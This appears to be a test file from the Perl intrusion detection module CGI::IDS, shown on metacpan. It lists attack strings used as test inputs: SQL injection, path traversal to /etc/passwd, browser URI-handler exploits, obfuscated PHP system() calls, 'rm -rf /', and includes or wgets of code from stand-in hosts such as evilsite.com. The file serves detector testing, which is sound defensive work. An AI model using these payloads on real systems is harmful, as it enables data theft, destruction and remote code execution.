CGI-IDS
view release on metacpan or search on metacpan
1 => "asd'; select null,password,null from users; ",
2 => "aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user OPEN tablecursor ",
3 => "aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b
where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user
OPEN tablecursor FETCH NEXT FROM tablecursor INTO \@a,\@b WHILE(\@a != null)
\@query = null+null+null+null+ ' UPDATE '+null+\@a+null+ ' SET id=null,\@b = \@payload'
BEGIN EXEC sp_executesql \@query
FETCH NEXT FROM tablecursor INTO \@a,\@b END
CLOSE tablecursor DEALLOCATE tablecursor;
and some text, to get pass the centrifuge; and some more text.",
4 => "\@query = null+null+null+ ' UPDATE '+null+\@a+ ' SET[ '+null+\@b+ ' ] = \@payload'",
5 => "asd' union distinct(select null,password,null from users)--a ",
6 => "asd' union distinct ( select null,password,(null)from user )-- a ",
7 => "'DECLARE%20\@S%20CHAR(4000);SET%20\@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6...
8 => "asaa';SELECT[asd]FROM[asd]",
9 => "asd'; select [column] from users ",
10 => "0x31 union select @"."@"."version,username,password from users ",
11 => "1 order by if(1<2 ,uname,uid) ",
12 => "1 order by ifnull(null,userid) ",
13 => "2' between 1 and 3 or 0x61 like 'a",
14 => "4' MOD 2 like '0",
15 => "-1' /ID having 1< 1 and 1 like 1/'1 ",
16 => "2' / 0x62 or 0 like binary '0",
17 => "0' between 2-1 and 4-1 or 1 sounds like binary '1 ",
18 => "-1' union ((select (select user),(select password),1/1 from mysql.user)) order by '1 ",
19 => "-1' or substring(null/null,1/null,1) or '1",
20 => "1' and 1 = hex(null-1 or 1) or 1 /'null ",
21 => "AND CONNECTION_ID()=CONNECTION_ID()",
22 => "AND ISNULL(1/0)",
23 => "MID(\@\@hostname, 1, 1)",
24 => "CHARSET(CURRENT_USER())",
25 => "DATABASE() LIKE SCHEMA()",
26 => "COERCIBILITY(USER())",
27 => "1' and 0x1abc like 0x88 or '0",
28 => "'-1-0 union select (select `table_name` from `information_schema`.tables limit 1) and '1",
29 => "null''null' find_in_set(uname, 'lightos' ) and '1",
30 => "(case-1 when mid(load_file(0x61616161),12, 1/ 1)like 0x61 then 1 else 0 end) ",
31 => CGI::IDS::urldecode('%27sounds%20like%281%29%20union%19%28select%191,group_concat%28table_name%29,3%19from%19information_schema.%60tables%60%29%23%28'),
32 => "0' '1' like (0) and 1 sounds like a or true#1",
);
my %testDTList = (
0 => '../../etc/passwd',
1 => '\\\%windir%\\\cmd.exe',
2 => '1;cat /e*c/p*d',
3 => '%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00',
4 => '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
5 => '/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini',
6 => 'C:\\boot.ini',
7 => '../../../../../../../../../../../../localstart.asp%00',
8 => '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini',
9 => '<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->',
10 => '../../../../../../../../conf/server.xml',
11 => '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd',
12 => 'dir/..././..././folder/file.php ',
);
my %testURIList = (
0 => 'firefoxurl:test|"%20-new-window%20file:\c:/test.txt',
1 => 'firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"',
2 => 'aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"',
3 => 'navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+...
4 => 'res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210',
5 => 'mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat',
);
my %testRFEList = (
0 => ';phpinfo()',
1 => '@phpinfo()',
2 => '"; <?php exec("rm -rf /"); ?>',
3 => '; file_get_contents(\'/usr/local/apache2/conf/httpd.conf\');',
4 => ';echo file_get_contents(implode(DIRECTORY_SEPARATOR, array("usr","local","apache2","conf","httpd.conf"))',
5 => '; include "http://evilsite.com/evilcode"',
6 => "; rm -rf /\0",
7 => '"; $_a=(! \'a\') . "php"; $_a.=(! \'a\') . "info"; $_a(1); $b="',
8 => '";
define ( _a, "0008avwga000934mm40re8n5n3aahgqvaga0a303") ;
if ( !0) $c = USXWATKXACICMVYEIkw71cLTLnHZHXOTAYADOCXC ^ _a;
if ( !0) system($c) ;//',
9 => '" ; //
if (!0) $_a ="". str_rot13(\'cevags\'); //
$_b = HTTP_USER_AGENT; //
$_c="". $_SERVER[$_b]; //
$_a( `$_c` );//',
10 => '"; //
$_c = "" . $_a($b);
$_b(`$_c`);//',
11 => '" ; //
if (!0) $_a = base64_decode ;
if (!0) $_b = parse_str ; //
$_c = "" . strrev("ftnirp");
if (!0) $_d = QUERY_STRING; //
$_e= "" . $_SERVER[$_d];
$_b($_e); //
$_f = "" . $_a($b);
$_c(`$_f`);//',
12 => '" ; //
$_y = "" . strrev("ftnirp");
if (!0) $_a = base64_decode ;
if (!0) $_b="" . $_a(\'cHdk\');
if (!0) $_y(`$_b`);//',
13 => '";{ if (true) $_a = "" . str_replace(\'!\',\'\',\'s!y!s!t!e!m!\');
$_a( "dir"); } //',
14 => '";{ if (true) $_a = "" . strtolower("pass");
if (1) $_a.= "" . strtolower("thru");
$_a( "dir"); } //',
15 => '";{if (!($_b[]++%1)) $_a[] = system;
$_a[0]( "ls"); } //',
16 => '";{if (pi) $_a[] = system;
$_a[0]( "ls"); } //',
17 => '";; //
if (!($_b[] %1)) $_a[0] = system;
$_a[0](!a. "ls"); //',
18 => '; e|$a=&$_GET; 0|$b=!a .$a[b];$a[a](`$b`);//',
19 => 'aaaa { $ {`wget hxxp://example.com/x.php`}}',
);
my %testUTF7List = (
0 => '+alert(1)',
1 => 'ACM=1,1+eval(1+name+(+ACM-1),ACM)',
2 => '1+eval(1+name+(+1-1),-1)',
( run in 0.803 second using v1.01-cache-2.11-cpan-cdf2f3d4e48 )